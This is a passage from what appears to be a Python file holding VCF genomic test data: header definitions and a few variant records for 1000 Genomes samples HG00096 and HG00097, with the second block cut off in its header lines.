##contig=<ID=19,assembly=b37,length=59128983>
##contig=<ID=20,assembly=b37,length=63025520>
##contig=<ID=21,assembly=b37,length=48129895>
##contig=<ID=22,assembly=b37,length=51304566>
##contig=<ID=GL000191.1,assembly=b37,length=106433>
##contig=<ID=GL000192.1,assembly=b37,length=547496>
##contig=<ID=GL000193.1,assembly=b37,length=189789>
##contig=<ID=GL000194.1,assembly=b37,length=191469>
##contig=<ID=GL000195.1,assembly=b37,length=182896>
##contig=<ID=GL000196.1,assembly=b37,length=38914>
##contig=<ID=GL000197.1,assembly=b37,length=37175>
##contig=<ID=GL000198.1,assembly=b37,length=90085>
##contig=<ID=GL000199.1,assembly=b37,length=169874>
##contig=<ID=GL000200.1,assembly=b37,length=187035>
##contig=<ID=GL000201.1,assembly=b37,length=36148>
##contig=<ID=GL000202.1,assembly=b37,length=40103>
##contig=<ID=GL000203.1,assembly=b37,length=37498>
##contig=<ID=GL000204.1,assembly=b37,length=81310>
##contig=<ID=GL000205.1,assembly=b37,length=174588>
##contig=<ID=GL000206.1,assembly=b37,length=41001>
##contig=<ID=GL000207.1,assembly=b37,length=4262>
##contig=<ID=GL000208.1,assembly=b37,length=92689>
##contig=<ID=GL000209.1,assembly=b37,length=159169>
##contig=<ID=GL000210.1,assembly=b37,length=27682>
##contig=<ID=GL000211.1,assembly=b37,length=166566>
##contig=<ID=GL000212.1,assembly=b37,length=186858>
##contig=<ID=GL000213.1,assembly=b37,length=164239>
##contig=<ID=GL000214.1,assembly=b37,length=137718>
##contig=<ID=GL000215.1,assembly=b37,length=172545>
##contig=<ID=GL000216.1,assembly=b37,length=172294>
##contig=<ID=GL000217.1,assembly=b37,length=172149>
##contig=<ID=GL000218.1,assembly=b37,length=161147>
##contig=<ID=GL000219.1,assembly=b37,length=179198>
##contig=<ID=GL000220.1,assembly=b37,length=161802>
##contig=<ID=GL000221.1,assembly=b37,length=155397>
##contig=<ID=GL000222.1,assembly=b37,length=186861>
##contig=<ID=GL000223.1,assembly=b37,length=180455>
##contig=<ID=GL000224.1,assembly=b37,length=179693>
##contig=<ID=GL000225.1,assembly=b37,length=211173>
##contig=<ID=GL000226.1,assembly=b37,length=15008>
##contig=<ID=GL000227.1,assembly=b37,length=128374>
##contig=<ID=GL000228.1,assembly=b37,length=129120>
##contig=<ID=GL000229.1,assembly=b37,length=19913>
##contig=<ID=GL000230.1,assembly=b37,length=43691>
##contig=<ID=GL000231.1,assembly=b37,length=27386>
##contig=<ID=GL000232.1,assembly=b37,length=40652>
##contig=<ID=GL000233.1,assembly=b37,length=45941>
##contig=<ID=GL000234.1,assembly=b37,length=40531>
##contig=<ID=GL000235.1,assembly=b37,length=34474>
##contig=<ID=GL000236.1,assembly=b37,length=41934>
##contig=<ID=GL000237.1,assembly=b37,length=45867>
##contig=<ID=GL000238.1,assembly=b37,length=39939>
##contig=<ID=GL000239.1,assembly=b37,length=33824>
##contig=<ID=GL000240.1,assembly=b37,length=41933>
##contig=<ID=GL000241.1,assembly=b37,length=42152>
##contig=<ID=GL000242.1,assembly=b37,length=43523>
##contig=<ID=GL000243.1,assembly=b37,length=43341>
##contig=<ID=GL000244.1,assembly=b37,length=39929>
##contig=<ID=GL000245.1,assembly=b37,length=36651>
##contig=<ID=GL000246.1,assembly=b37,length=38154>
##contig=<ID=GL000247.1,assembly=b37,length=36422>
##contig=<ID=GL000248.1,assembly=b37,length=39786>
##contig=<ID=GL000249.1,assembly=b37,length=38502>
##contig=<ID=MT,assembly=b37,length=16569>
##contig=<ID=NC_007605,assembly=b37,length=171823>
##contig=<ID=X,assembly=b37,length=155270560>
##contig=<ID=Y,assembly=b37,length=59373566>
##contig=<ID=hs37d5,assembly=b37,length=35477943>
##ALT=<ID=CNV,Description="Copy Number Polymorphism">
##ALT=<ID=DEL,Description="Deletion">
##ALT=<ID=DUP,Description="Duplication">
##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">
##ALT=<ID=INS:ME:LINE1,Description="Insertion of LINE1 element">
##ALT=<ID=INS:ME:SVA,Description="Insertion of SVA element">
##ALT=<ID=INS:MT,Description="Nuclear Mitochondrial Insertion">
##ALT=<ID=INV,Description="Inversion">
##ALT=<ID=CN0,Description="Copy number allele: 0 copies">
##ALT=<ID=CN1,Description="Copy number allele: 1 copy">
##ALT=<ID=CN2,Description="Copy number allele: 2 copies">
##ALT=<ID=CN3,Description="Copy number allele: 3 copies">
##ALT=<ID=CN4,Description="Copy number allele: 4 copies">
##ALT=<ID=CN5,Description="Copy number allele: 5 copies">
##ALT=<ID=CN6,Description="Copy number allele: 6 copies">
##ALT=<ID=CN7,Description="Copy number allele: 7 copies">
##ALT=<ID=CN8,Description="Copy number allele: 8 copies">
##ALT=<ID=CN9,Description="Copy number allele: 9 copies">
##ALT=<ID=CN10,Description="Copy number allele: 10 copies">
##ALT=<ID=CN11,Description="Copy number allele: 11 copies">
##ALT=<ID=CN12,Description="Copy number allele: 12 copies">
##ALT=<ID=CN13,Description="Copy number allele: 13 copies">
##ALT=<ID=CN14,Description="Copy number allele: 14 copies">
##ALT=<ID=CN15,Description="Copy number allele: 15 copies">
##ALT=<ID=CN16,Description="Copy number allele: 16 copies">
##ALT=<ID=CN17,Description="Copy number allele: 17 copies">
##ALT=<ID=CN18,Description="Copy number allele: 18 copies">
##ALT=<ID=CN19,Description="Copy number allele: 19 copies">
##ALT=<ID=CN20,Description="Copy number allele: 20 copies">
##ALT=<ID=CN21,Description="Copy number allele: 21 copies">
##ALT=<ID=CN22,Description="Copy number allele: 22 copies">
##ALT=<ID=CN23,Description="Copy number allele: 23 copies">
##ALT=<ID=CN24,Description="Copy number allele: 24 copies">
##ALT=<ID=CN25,Description="Copy number allele: 25 copies">
##ALT=<ID=CN26,Description="Copy number allele: 26 copies">
##ALT=<ID=CN27,Description="Copy number allele: 27 copies">
##ALT=<ID=CN28,Description="Copy number allele: 28 copies">
##ALT=<ID=CN29,Description="Copy number allele: 29 copies">
##ALT=<ID=CN30,Description="Copy number allele: 30 copies">
##ALT=<ID=CN31,Description="Copy number allele: 31 copies">
##ALT=<ID=CN32,Description="Copy number allele: 32 copies">
##ALT=<ID=CN33,Description="Copy number allele: 33 copies">
##ALT=<ID=CN34,Description="Copy number allele: 34 copies">
##ALT=<ID=CN35,Description="Copy number allele: 35 copies">
##ALT=<ID=CN36,Description="Copy number allele: 36 copies">
##ALT=<ID=CN37,Description="Copy number allele: 37 copies">
##ALT=<ID=CN38,Description="Copy number allele: 38 copies">
##ALT=<ID=CN39,Description="Copy number allele: 39 copies">
##ALT=<ID=CN40,Description="Copy number allele: 40 copies">
##ALT=<ID=CN41,Description="Copy number allele: 41 copies">
##ALT=<ID=CN42,Description="Copy number allele: 42 copies">
##ALT=<ID=CN43,Description="Copy number allele: 43 copies">
##ALT=<ID=CN44,Description="Copy number allele: 44 copies">
##ALT=<ID=CN45,Description="Copy number allele: 45 copies">
##ALT=<ID=CN46,Description="Copy number allele: 46 copies">
##ALT=<ID=CN47,Description="Copy number allele: 47 copies">
##ALT=<ID=CN48,Description="Copy number allele: 48 copies">
##ALT=<ID=CN49,Description="Copy number allele: 49 copies">
##ALT=<ID=CN50,Description="Copy number allele: 50 copies">
##ALT=<ID=CN51,Description="Copy number allele: 51 copies">
##ALT=<ID=CN52,Description="Copy number allele: 52 copies">
##ALT=<ID=CN53,Description="Copy number allele: 53 copies">
##ALT=<ID=CN54,Description="Copy number allele: 54 copies">
##ALT=<ID=CN55,Description="Copy number allele: 55 copies">
##ALT=<ID=CN56,Description="Copy number allele: 56 copies">
##ALT=<ID=CN57,Description="Copy number allele: 57 copies">
##ALT=<ID=CN58,Description="Copy number allele: 58 copies">
##ALT=<ID=CN59,Description="Copy number allele: 59 copies">
##ALT=<ID=CN60,Description="Copy number allele: 60 copies">
##ALT=<ID=CN61,Description="Copy number allele: 61 copies">
##ALT=<ID=CN62,Description="Copy number allele: 62 copies">
##ALT=<ID=CN63,Description="Copy number allele: 63 copies">
##ALT=<ID=CN64,Description="Copy number allele: 64 copies">
##ALT=<ID=CN65,Description="Copy number allele: 65 copies">
##ALT=<ID=CN66,Description="Copy number allele: 66 copies">
##ALT=<ID=CN67,Description="Copy number allele: 67 copies">
##ALT=<ID=CN68,Description="Copy number allele: 68 copies">
##ALT=<ID=CN69,Description="Copy number allele: 69 copies">
##ALT=<ID=CN70,Description="Copy number allele: 70 copies">
##ALT=<ID=CN71,Description="Copy number allele: 71 copies">
##ALT=<ID=CN72,Description="Copy number allele: 72 copies">
##ALT=<ID=CN73,Description="Copy number allele: 73 copies">
##ALT=<ID=CN74,Description="Copy number allele: 74 copies">
##ALT=<ID=CN75,Description="Copy number allele: 75 copies">
##ALT=<ID=CN76,Description="Copy number allele: 76 copies">
##ALT=<ID=CN77,Description="Copy number allele: 77 copies">
##ALT=<ID=CN78,Description="Copy number allele: 78 copies">
##ALT=<ID=CN79,Description="Copy number allele: 79 copies">
##ALT=<ID=CN80,Description="Copy number allele: 80 copies">
##ALT=<ID=CN81,Description="Copy number allele: 81 copies">
##ALT=<ID=CN82,Description="Copy number allele: 82 copies">
##ALT=<ID=CN83,Description="Copy number allele: 83 copies">
##ALT=<ID=CN84,Description="Copy number allele: 84 copies">
##ALT=<ID=CN85,Description="Copy number allele: 85 copies">
##ALT=<ID=CN86,Description="Copy number allele: 86 copies">
##ALT=<ID=CN87,Description="Copy number allele: 87 copies">
##ALT=<ID=CN88,Description="Copy number allele: 88 copies">
##ALT=<ID=CN89,Description="Copy number allele: 89 copies">
##ALT=<ID=CN90,Description="Copy number allele: 90 copies">
##ALT=<ID=CN91,Description="Copy number allele: 91 copies">
##ALT=<ID=CN92,Description="Copy number allele: 92 copies">
##ALT=<ID=CN93,Description="Copy number allele: 93 copies">
##ALT=<ID=CN94,Description="Copy number allele: 94 copies">
##ALT=<ID=CN95,Description="Copy number allele: 95 copies">
##ALT=<ID=CN96,Description="Copy number allele: 96 copies">
##ALT=<ID=CN97,Description="Copy number allele: 97 copies">
##ALT=<ID=CN98,Description="Copy number allele: 98 copies">
##ALT=<ID=CN99,Description="Copy number allele: 99 copies">
##ALT=<ID=CN100,Description="Copy number allele: 100 copies">
##ALT=<ID=CN101,Description="Copy number allele: 101 copies">
##ALT=<ID=CN102,Description="Copy number allele: 102 copies">
##ALT=<ID=CN103,Description="Copy number allele: 103 copies">
##ALT=<ID=CN104,Description="Copy number allele: 104 copies">
##ALT=<ID=CN105,Description="Copy number allele: 105 copies">
##ALT=<ID=CN106,Description="Copy number allele: 106 copies">
##ALT=<ID=CN107,Description="Copy number allele: 107 copies">
##ALT=<ID=CN108,Description="Copy number allele: 108 copies">
##ALT=<ID=CN109,Description="Copy number allele: 109 copies">
##ALT=<ID=CN110,Description="Copy number allele: 110 copies">
##ALT=<ID=CN111,Description="Copy number allele: 111 copies">
##ALT=<ID=CN112,Description="Copy number allele: 112 copies">
##ALT=<ID=CN113,Description="Copy number allele: 113 copies">
##ALT=<ID=CN114,Description="Copy number allele: 114 copies">
##ALT=<ID=CN115,Description="Copy number allele: 115 copies">
##ALT=<ID=CN116,Description="Copy number allele: 116 copies">
##ALT=<ID=CN117,Description="Copy number allele: 117 copies">
##ALT=<ID=CN118,Description="Copy number allele: 118 copies">
##ALT=<ID=CN119,Description="Copy number allele: 119 copies">
##ALT=<ID=CN120,Description="Copy number allele: 120 copies">
##ALT=<ID=CN121,Description="Copy number allele: 121 copies">
##ALT=<ID=CN122,Description="Copy number allele: 122 copies">
##ALT=<ID=CN123,Description="Copy number allele: 123 copies">
##ALT=<ID=CN124,Description="Copy number allele: 124 copies">
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##INFO=<ID=CIEND,Number=2,Type=Integer,Description="Confidence interval around END for imprecise variants">
##INFO=<ID=CIPOS,Number=2,Type=Integer,Description="Confidence interval around POS for imprecise variants">
##INFO=<ID=CS,Number=1,Type=String,Description="Source call set.">
##INFO=<ID=END,Number=1,Type=Integer,Description="End coordinate of this variant">
##INFO=<ID=IMPRECISE,Number=0,Type=Flag,Description="Imprecise structural variation">
##INFO=<ID=MC,Number=.,Type=String,Description="Merged calls.">
##INFO=<ID=MEINFO,Number=4,Type=String,Description="Mobile element info of the form NAME,START,END<POLARITY; If there is only 5' OR 3' support for this call, will be NULL NULL for START and END">
##INFO=<ID=MEND,Number=1,Type=Integer,Description="Mitochondrial end coordinate of inserted sequence">
##INFO=<ID=MLEN,Number=1,Type=Integer,Description="Estimated length of mitochondrial insert">
##INFO=<ID=MSTART,Number=1,Type=Integer,Description="Mitochondrial start coordinate of inserted sequence">
##INFO=<ID=SVLEN,Number=.,Type=Integer,Description="SV length. It is only calculated for structural variation MEIs. For other types of SVs; one may calculate the SV length by INFO:END-START+1, or by finding the difference between lengthes of REF and ALT alleles">
##INFO=<ID=SVTYPE,Number=1,Type=String,Description="Type of structural variant">
##INFO=<ID=TSD,Number=1,Type=String,Description="Precise Target Site Duplication for bases, if unknown, value will be NULL">
##INFO=<ID=AC,Number=A,Type=Integer,Description="Total number of alternate alleles in called genotypes">
##INFO=<ID=AF,Number=A,Type=Float,Description="Estimated allele frequency in the range (0,1)">
##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data">
##INFO=<ID=AN,Number=1,Type=Integer,Description="Total number of alleles in called genotypes">
##INFO=<ID=EAS_AF,Number=A,Type=Float,Description="Allele frequency in the EAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=EUR_AF,Number=A,Type=Float,Description="Allele frequency in the EUR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AFR_AF,Number=A,Type=Float,Description="Allele frequency in the AFR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=AMR_AF,Number=A,Type=Float,Description="Allele frequency in the AMR populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=SAS_AF,Number=A,Type=Float,Description="Allele frequency in the SAS populations calculated from AC and AN, in the range (0,1)">
##INFO=<ID=DP,Number=1,Type=Integer,Description="Total read depth; only low coverage data were counted towards the DP, exome data were not used">
##INFO=<ID=AA,Number=1,Type=String,Description="Ancestral Allele. Format: AA|REF|ALT|IndelType. AA: Ancestral allele, REF:Reference Allele, ALT:Alternate Allele, IndelType:Type of Indel (REF, ALT and IndelType are only defined for indels)">
##INFO=<ID=VT,Number=.,Type=String,Description="indicates what type of variant the line represents">
##INFO=<ID=EX_TARGET,Number=0,Type=Flag,Description="indicates whether a variant is within the exon pull down target boundaries">
##INFO=<ID=MULTI_ALLELIC,Number=0,Type=Flag,Description="indicates whether a site is multi-allelic">
##bcftools_viewVersion=1.6+htslib-1.6
##bcftools_viewCommand=view -c1 -Oz -s HG00096 -o G1000_chr1_10000_20000.HG00096.vcf.gz G1000_chr1_10000_20000.vcf.gz; Date=Mon Nov 6 15:48:17 2017
#CHROM POS ID REF ALT QUAL FILTER INFO FORMAT HG00096
1 10177 rs367896724 A AC 100 PASS AC=1;AF=0.425319;AN=2;NS=2504;DP=103152;EAS_AF=0.3363;AMR_AF=0.3602;AFR_AF=0.4909;EUR_AF=0.4056;SAS_AF=0.4949;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 1|0
1 10352 rs555500075 T TA 100 PASS AC=1;AF=0.4375;AN=2;NS=2504;DP=88915;EAS_AF=0.4306;AMR_AF=0.4107;AFR_AF=0.4788;EUR_AF=0.4264;SAS_AF=0.4192;AA=|||unknown(NO_COVERAGE);VT=INDEL GT 1|0
1 10616 rs376342519 CCGCCGTTGCAAAGGCGCGCCG C 100 PASS AC=2;AF=0.993011;AN=2;NS=2504;DP=2365;EAS_AF=0.9911;AMR_AF=0.9957;AFR_AF=0.9894;EUR_AF=0.994;SAS_AF=0.9969;VT=INDEL GT 1|1
1 14464 rs546169444 A T 100 PASS AC=2;AF=0.0958466;AN=2;NS=2504;DP=26761;EAS_AF=0.005;AMR_AF=0.1138;AFR_AF=0.0144;EUR_AF=0.1859;SAS_AF=0.1943;AA=a|||;VT=SNP GT 1|1
1 14930 rs75454623 A G 100 PASS AC=1;AF=0.482228;AN=2;NS=2504;DP=42231;EAS_AF=0.4137;AMR_AF=0.5231;AFR_AF=0.4811;EUR_AF=0.5209;SAS_AF=0.4857;AA=a|||;VT=SNP GT 1|0
1 15211 rs78601809 T G 100 PASS AC=1;AF=0.609026;AN=2;NS=2504;DP=32245;EAS_AF=0.504;AMR_AF=0.6772;AFR_AF=0.5371;EUR_AF=0.7316;SAS_AF=0.6401;AA=t|||;VT=SNP GT 0|1
1 15274 rs62636497 A G,T 100 PASS AC=1,1;AF=0.347244,0.640974;AN=2;NS=2504;DP=23255;EAS_AF=0.4812,0.5188;AMR_AF=0.2752,0.7205;AFR_AF=0.323,0.6369;EUR_AF=0.2922,0.7078;SAS_AF=0.3497,0.6472;AA=g|||;VT=SNP;MULTI_ALLELIC GT 1|2
1 15820 rs2691315 G T 100 PASS AC=1;AF=0.410543;AN=2;NS=2504;DP=14933;EAS_AF=0.6052;AMR_AF=0.2939;AFR_AF=0.4849;EUR_AF=0.2714;SAS_AF=0.3354;AA=t|||;VT=SNP;EX_TARGET GT 1|0
1 15903 rs557514207 G GC 100 PASS AC=1;AF=0.441094;AN=2;NS=2504;DP=7012;EAS_AF=0.8681;AMR_AF=0.415;AFR_AF=0.0431;EUR_AF=0.4652;SAS_AF=0.5327;AA=ccc|CC|CCC|deletion;VT=INDEL;EX_TARGET GT 0|1
1 18849 rs533090414 C G 100 PASS AC=2;AF=0.951877;AN=2;NS=2504;DP=4700;EAS_AF=1;AMR_AF=0.9769;AFR_AF=0.8411;EUR_AF=0.9911;SAS_AF=0.9939;AA=g|||;VT=SNP GT 1|1
"""
HG00097_VCF_CONTENTS = """##fileformat=VCFv4.1
##FILTER=<ID=PASS,Description="All filters passed">
##fileDate=20150218
##reference=ftp://ftp.1000genomes.ebi.ac.uk//vol1/ftp/technical/reference/phase2_reference_assembly_sequence/hs37d5.fa.gz
##source=1000GenomesPhase3Pipeline
##contig=<ID=1,assembly=b37,length=249250621>
##contig=<ID=2,assembly=b37,length=243199373>
##contig=<ID=3,assembly=b37,length=198022430>
##contig=<ID=4,assembly=b37,length=191154276>
##contig=<ID=5,assembly=b37,length=180915260>
##contig=<ID=6,assembly=b37,length=171115067>
##contig=<ID=7,assembly=b37,length=159138663>
##contig=<ID=8,assembly=b37,length=146364022>
##contig=<ID=9,assembly=b37,length=141213431>
##contig=<ID=10,assembly=b37,length=135534747>
##contig=<ID=11,assembly=b37,length=135006516>
##contig=<ID=12,assembly=b37,length=133851895>
##contig=<ID=13,assembly=b37,length=115169878>
##contig=<ID=14,assembly=b37,length=107349540>
##contig=<ID=15,assembly=b37,length=102531392>
##contig=<ID=16,assembly=b37,length=90354753>
##contig=<ID=17,assembly=b37,length=81195210>
##contig=<ID=18,assembly=b37,length=78077248>
##contig=<ID=19,assembly=b37,length=59128983>
##contig=<ID=20,assembly=b37,length=63025520>
##contig=<ID=21,assembly=b37,length=48129895>
##contig=<ID=22,assembly=b37,length=51304566>
##contig=<ID=GL000191.1,assembly=b37,length=106433>
##contig=<ID=GL000192.1,assembly=b37,length=547496>
##contig=<ID=GL000193.1,assembly=b37,length=189789>
##contig=<ID=GL000194.1,assembly=b37,length=191469>
##contig=<ID=GL000195.1,assembly=b37,length=182896>
##contig=<ID=GL000196.1,assembly=b37,length=38914>
##contig=<ID=GL000197.1,assembly=b37,length=37175>
##contig=<ID=GL000198.1,assembly=b37,length=90085>
##contig=<ID=GL000199.1,assembly=b37,length=169874>
##contig=<ID=GL000200.1,assembly=b37,length=187035>
##contig=<ID=GL000201.1,assembly=b37,length=36148>
##contig=<ID=GL000202.1,assembly=b37,length=40103>
##contig=<ID=GL000203.1,assembly=b37,length=37498>
##contig=<ID=GL000204.1,assembly=b37,length=81310>
##contig=<ID=GL000205.1,assembly=b37,length=174588>
##contig=<ID=GL000206.1,assembly=b37,length=41001>
##contig=<ID=GL000207.1,assembly=b37,length=4262>
##contig=<ID=GL000208.1,assembly=b37,length=92689>
##contig=<ID=GL000209.1,assembly=b37,length=159169>
##contig=<ID=GL000210.1,assembly=b37,length=27682>
##contig=<ID=GL000211.1,assembly=b37,length=166566>
##contig=<ID=GL000212.1,assembly=b37,length=186858>
##contig=<ID=GL000213.1,assembly=b37,length=164239>
##contig=<ID=GL000214.1,assembly=b37,length=137718>
##contig=<ID=GL000215.1,assembly=b37,length=172545>
##contig=<ID=GL000216.1,assembly=b37,length=172294>
##contig=<ID=GL000217.1,assembly=b37,length=172149>
##contig=<ID=GL000218.1,assembly=b37,length=161147>
##contig=<ID=GL000219.1,assembly=b37,length=179198>
##contig=<ID=GL000220.1,assembly=b37,length=161802>
##contig=<ID=GL000221.1,assembly=b37,length=155397>
##contig=<ID=GL000222.1,assembly=b37,length=186861>
##contig=<ID=GL000223.1,assembly=b37,length=180455>
##contig=<ID=GL000224.1,assembly=b37,length=179693>
##contig=<ID=GL000225.1,assembly=b37,length=211173>
##contig=<ID=GL000226.1,assembly=b37,length=15008>
##contig=<ID=GL000227.1,assembly=b37,length=128374>
##contig=<ID=GL000228.1,assembly=b37,length=129120>
##contig=<ID=GL000229.1,assembly=b37,length=19913>
##contig=<ID=GL000230.1,assembly=b37,length=43691>
##contig=<ID=GL000231.1,assembly=b37,length=27386>
##contig=<ID=GL000232.1,assembly=b37,length=40652>
##contig=<ID=GL000233.1,assembly=b37,length=45941>
##contig=<ID=GL000234.1,assembly=b37,length=40531>
##contig=<ID=GL000235.1,assembly=b37,length=34474>
##contig=<ID=GL000236.1,assembly=b37,length=41934>
##contig=<ID=GL000237.1,assembly=b37,length=45867>
##contig=<ID=GL000238.1,assembly=b37,length=39939>
##contig=<ID=GL000239.1,assembly=b37,length=33824>
##contig=<ID=GL000240.1,assembly=b37,length=41933>
##contig=<ID=GL000241.1,assembly=b37,length=42152>
##contig=<ID=GL000242.1,assembly=b37,length=43523>
##contig=<ID=GL000243.1,assembly=b37,length=43341>
##contig=<ID=GL000244.1,assembly=b37,length=39929>
##contig=<ID=GL000245.1,assembly=b37,length=36651>
##contig=<ID=GL000246.1,assembly=b37,length=38154>
##contig=<ID=GL000247.1,assembly=b37,length=36422>
##contig=<ID=GL000248.1,assembly=b37,length=39786>
##contig=<ID=GL000249.1,assembly=b37,length=38502>
##contig=<ID=MT,assembly=b37,length=16569>
##contig=<ID=NC_007605,assembly=b37,length=171823>
##contig=<ID=X,assembly=b37,length=155270560>
##contig=<ID=Y,assembly=b37,length=59373566>
##contig=<ID=hs37d5,assembly=b37,length=35477943>
##ALT=<ID=CNV,Description="Copy Number Polymorphism">
##ALT=<ID=DEL,Description="Deletion">
##ALT=<ID=DUP,Description="Duplication">
##ALT=<ID=INS:ME:ALU,Description="Insertion of ALU element">
##ALT=<ID=INS:ME:LINE1,Description="Insertion of LINE1 element">
##ALT=<ID=INS:ME:SVA,Description="Insertion of SVA element">
##ALT=<ID=INS:MT,Description="Nuclear Mitochondrial Insertion">
##ALT=<ID=INV,Description="Inversion">
##ALT=<ID=CN0,Description="Copy number allele: 0 copies">
##ALT=<ID=CN1,Description="Copy number allele: 1 copy">
##ALT=<ID=CN2,Description="Copy number allele: 2 copies">
##ALT=<ID=CN3,Description="Copy number allele: 3 copies">
##ALT=<ID=CN4,Description="Copy number allele: 4 copies">
##ALT=<ID=CN5,Description="Copy number allele: 5 copies">
##ALT=<ID=CN6,Description="Copy number allele: 6 copies">
##ALT=<ID=CN7,Description="Copy number allele: 7 copies">
##ALT=<ID=CN8,Description="Copy number allele: 8 copies">
##ALT=<ID=CN9,Description="Copy number allele: 9 copies">
##ALT=<ID=CN10,Description="Copy number allele: 10 copies">
##ALT=<ID=CN11,Description="Copy number allele: 11 copies">
##ALT=<ID=CN12,Description="Copy number allele: 12 copies">
##ALT=<ID=CN13,Description="Copy number allele: 13 copies">
##ALT=<ID=CN14,Description="Copy number allele: 14 copies">
##ALT=<ID=CN15,Description="Copy number allele: 15 copies">
##ALT=<ID=CN16,Description="Copy number allele: 16 copies">
##ALT=<ID=CN17,Description="Copy number allele: 17 copies">
##ALT=<ID=CN18,Description="Copy number allele: 18 copies">
##ALT=<ID=CN19,Description="Copy number allele: 19 copies">
##ALT=<ID=CN20,Description="Copy number allele: 20 copies">
##ALT=<ID=CN21,Description="Copy number allele: 21 copies">
##ALT=<ID=CN22,Description="Copy number allele: 22 copies">
##ALT=<ID=CN23,Description="Copy number allele: 23 copies">
##ALT=<ID=CN24,Description="Copy number allele: 24 copies">
##ALT=<ID=CN25,Description="Copy number allele: 25 copies">
##ALT=<ID=CN26,Description="Copy number allele: 26 copies">
##ALT=<ID=CN27,Description="Copy number allele: 27 copies">
##ALT=<ID=CN28,Description="Copy number allele: 28 copies">
##ALT=<ID=CN29,Description="Copy number allele: 29 copies">
##ALT=<ID=CN30,Description="Copy number allele: 30 copies">
##ALT=<ID=CN31,Description="Copy number allele: 31 copies">
##ALT=<ID=CN32,Description="Copy number allele: 32 copies">
##ALT=<ID=CN33,Description="Copy number allele: 33 copies">
##ALT=<ID=CN34,Description="Copy number allele: 34 copies">
##ALT=<ID=CN35,Description="Copy number allele: 35 copies">
##ALT=<ID=CN36,Description="Copy number allele: 36 copies">
##ALT=<ID=CN37,Description="Copy number allele: 37 copies">
##ALT=<ID=CN38,Description="Copy number allele: 38 copies">
##ALT=<ID=CN39,Description="Copy number allele: 39 copies">
##ALT=<ID=CN40,Description="Copy number allele: 40 copies">
##ALT=<ID=CN41,Description="Copy number allele: 41 copies">
##ALT=<ID=CN42,Description="Copy number allele: 42 copies">
##ALT=<ID=CN43,Description="Copy number allele: 43 copies">
##ALT=<ID=CN44,Description="Copy number allele: 44 copies">
##ALT=<ID=CN45,Description="Copy number allele: 45 copies">
##ALT=<ID=CN46,Description="Copy number allele: 46 copies">
##ALT=<ID=CN47,Description="Copy number allele: 47 copies">
##ALT=<ID=CN48,Description="Copy number allele: 48 copies">
##ALT=<ID=CN49,Description="Copy number allele: 49 copies">
##ALT=<ID=CN50,Description="Copy number allele: 50 copies">
##ALT=<ID=CN51,Description="Copy number allele: 51 copies">
##ALT=<ID=CN52,Description="Copy number allele: 52 copies">
##ALT=<ID=CN53,Description="Copy number allele: 53 copies">
##ALT=<ID=CN54,Description="Copy number allele: 54 copies">
##ALT=<ID=CN55,Description="Copy number allele: 55 copies">
##ALT=<ID=CN56,Description="Copy number allele: 56 copies">
##ALT=<ID=CN57,Description="Copy number allele: 57 copies">
##ALT=<ID=CN58,Description="Copy number allele: 58 copies">
##ALT=<ID=CN59,Description="Copy number allele: 59 copies">
##ALT=<ID=CN60,Description="Copy number allele: 60 copies">
##ALT=<ID=CN61,Description="Copy number allele: 61 copies">
##ALT=<ID=CN62,Description="Copy number allele: 62 copies">
##ALT=<ID=CN63,Description="Copy number allele: 63 copies">
##ALT=<ID=CN64,Description="Copy number allele: 64 copies">
##ALT=<ID=CN65,Description="Copy number allele: 65 copies">
##ALT=<ID=CN66,Description="Copy number allele: 66 copies">
##ALT=<ID=CN67,Description="Copy number allele: 67 copies">
##ALT=<ID=CN68,Description="Copy number allele: 68 copies">
##ALT=<ID=CN69,Description="Copy number allele: 69 copies">
##ALT=<ID=CN70,Description="Copy number allele: 70 copies">
##ALT=<ID=CN71,Description="Copy number allele: 71 copies">
##ALT=<ID=CN72,Description="Copy number allele: 72 copies">
##ALT=<ID=CN73,Description="Copy number allele: 73 copies">
##ALT=<ID=CN74,Description="Copy number allele: 74 copies">
##ALT=<ID=CN75,Description="Copy number allele: 75 copies">
##ALT=<ID=CN76,Description="Copy number allele: 76 copies">
##ALT=<ID=CN77,Description="Copy number allele: 77 copies">
##ALT=<ID=CN78,Description="Copy number allele: 78 copies">
##ALT=<ID=CN79,Description="Copy number allele: 79 copies">
##ALT=<ID=CN80,Description="Copy number allele: 80 copies">
##ALT=<ID=CN81,Description="Copy number allele: 81 copies">
##ALT=<ID=CN82,Description="Copy number allele: 82 copies">
##ALT=<ID=CN83,Description="Copy number allele: 83 copies">
##ALT=<ID=CN84,Description="Copy number allele: 84 copies">
##ALT=<ID=CN85,Description="Copy number allele: 85 copies">
##ALT=<ID=CN86,Description="Copy number allele: 86 copies">
##ALT=<ID=CN87,Description="Copy number allele: 87 copies">
##ALT=<ID=CN88,Description="Copy number allele: 88 copies">
##ALT=<ID=CN89,Description="Copy number allele: 89 copies">
##ALT=<ID=CN90,Description="Copy number allele: 90 copies">
##ALT=<ID=CN91,Description="Copy number allele: 91 copies">
##ALT=<ID=CN92,Description="Copy number allele: 92 copies">
##ALT=<ID=CN93,Description="Copy number allele: 93 copies">
##ALT=<ID=CN94,Description="Copy number allele: 94 copies">
##ALT=<ID=CN95,Description="Copy number allele: 95 copies">
##ALT=<ID=CN96,Description="Copy number allele: 96 copies">
##ALT=<ID=CN97,Description="Copy number allele: 97 copies">
##ALT=<ID=CN98,Description="Copy number allele: 98 copies">
##ALT=<ID=CN99,Description="Copy number allele: 99 copies">
##ALT=<ID=CN100,Description="Copy number allele: 100 copies">
##ALT=<ID=CN101,Description="Copy number allele: 101 copies">
##ALT=<ID=CN102,Description="Copy number allele: 102 copies">
##ALT=<ID=CN103,Description="Copy number allele: 103 copies">
##ALT=<ID=CN104,Description="Copy number allele: 104 copies">
##ALT=<ID=CN105,Description="Copy number allele: 105 copies">
##ALT=<ID=CN106,Description="Copy number allele: 106 copies">
##ALT=<ID=CN107,Description="Copy number allele: 107 copies">
##ALT=<ID=CN108,Description="Copy number allele: 108 copies">
##ALT=<ID=CN109,Description="Copy number allele: 109 copies">
##ALT=<ID=CN110,Description="Copy number allele: 110 copies">
##ALT=<ID=CN111,Description="Copy number allele: 111 copies">
##ALT=<ID=CN112,Description="Copy number allele: 112 copies">
